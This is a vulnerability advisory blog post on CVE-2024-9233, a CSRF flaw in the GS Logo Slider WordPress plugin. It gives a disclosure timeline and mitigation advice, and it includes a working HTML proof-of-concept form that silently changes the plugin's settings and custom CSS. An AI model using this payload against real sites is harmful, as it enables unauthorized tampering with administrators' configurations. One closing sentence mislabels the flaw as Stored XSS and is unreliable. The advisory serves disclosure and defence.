CVE-2024-9233 is a newly discovered vulnerability in the GS Logo Slider plugin, which is installed on over 50,000 WordPress sites. This vulnerability exposes the plugin to Cross-Site Request Forgery (CSRF) attacks, enabling unauthorized users to manipulate plugin settings on behalf of an authenticated user without their consent. Exploiting this vulnerability can result in unwanted changes to the plugin’s configuration, potentially impacting site functionality and security.

CVECVE-2024-9233
PluginGS Logo Slider < 3.7.1
CriticalHigh
All Time647 456
Active installations50 000+
Publicly PublishedOctober 15, 2024
Last UpdatedOctober 15, 2024
ResearcherDmitrii Ignatyev
OWASP TOP-10A2: Broken Authentication and Session Management
PoCYes
ExploitNo
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9233
https://wpscan.com/vulnerability/a466cea4-0ae5-44a1-9e12-bd5dbecde2f2/
Plugin Security Certification by CleanTalk
Logo of the plugin

Timeline

August 29, 2024Plugin testing and vulnerability detection in the  GS Logo Slider have been completed
August 29, 2024I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
October 15, 2024Registered CVE-2024-9233

Discovery of the Vulnerability

The vulnerability was uncovered during security testing of the GS Logo Slider plugin. It was found that the plugin’s settings could be manipulated through CSRF attacks, allowing unauthorized users to alter configurations without the knowledge or approval of the site administrator. The flaw lies in the lack of proper CSRF validation, which permits malicious actors to submit requests that modify plugin settings.

Understanding of CSRF attack’s

Cross-Site Request Forgery (CSRF) attacks occur when a malicious actor tricks an authenticated user into unknowingly submitting requests on their behalf. In WordPress, CSRF vulnerabilities are especially dangerous as they allow attackers to alter critical site settings or even escalate privileges, depending on the site’s configuration.

Real-world examples of CSRF vulnerabilities include attacks that change user account information, alter security settings, or modify sensitive plugin configurations. In the case of CVE-2024-9233, the vulnerability in the GS Logo Slider plugin permits unauthorized modifications to the plugin’s display and functionality settings, which could affect site aesthetics or even degrade performance.

Exploiting the CSRF Vulnerability

Exploiting CVE-2024-9233 requires the attacker to create a page containing a specially crafted HTML form, as demonstrated in the PoC. This form sends POST requests to the WordPress admin endpoint to modify plugin settings. When an authenticated admin visits this page, the form submits the request automatically, updating the plugin settings without user approval.

POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="gslogo&#95;save&#95;shortcode&#95;pref" />
      <input type="hidden" name="prefs&#91;enable&#95;single&#95;page&#93;" value="on" />
      <input type="hidden" name="prefs&#91;disable&#95;lazy&#95;load&#93;" value="on" />
      <input type="hidden" name="prefs&#91;lazy&#95;load&#95;class&#93;" value="test" />
      <input type="hidden" name="prefs&#91;anchor&#95;tag&#95;rel&#93;" value="test" />
      <input type="hidden" name="prefs&#91;gs&#95;logo&#95;slider&#95;custom&#95;css&#93;" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

____

The risks posed by CVE-2024-9233 are considerable. Successful exploitation could lead to unwanted configuration changes, which may impact site performance, security, and appearance. For example, an attacker could enable or disable lazy loading, affect SEO by altering anchor tags, or insert arbitrary CSS that could disrupt the site’s design.

In real-world scenarios, attackers could use this vulnerability to trick administrators into visiting pages containing CSRF attacks, silently altering site configurations to suit the attacker’s agenda. This could be particularly damaging for e-commerce sites or business websites that rely on stable functionality and appearance.

Recommendations for Improved Security

To mitigate the risks of CVE-2024-9233, WordPress administrators should update the GS Logo Slider plugin to the latest version as soon as a patch is available. Developers must implement proper CSRF validation on all settings update requests to ensure that only authorized requests from trusted users are processed.

By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-9233, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii I.
CVE-2024-9233 – GS Logo Slider – Unauth Settings Update via Cross-Site Request Forgery (CSRF) – POC

Leave a Reply

Your email address will not be published. Required fields are marked *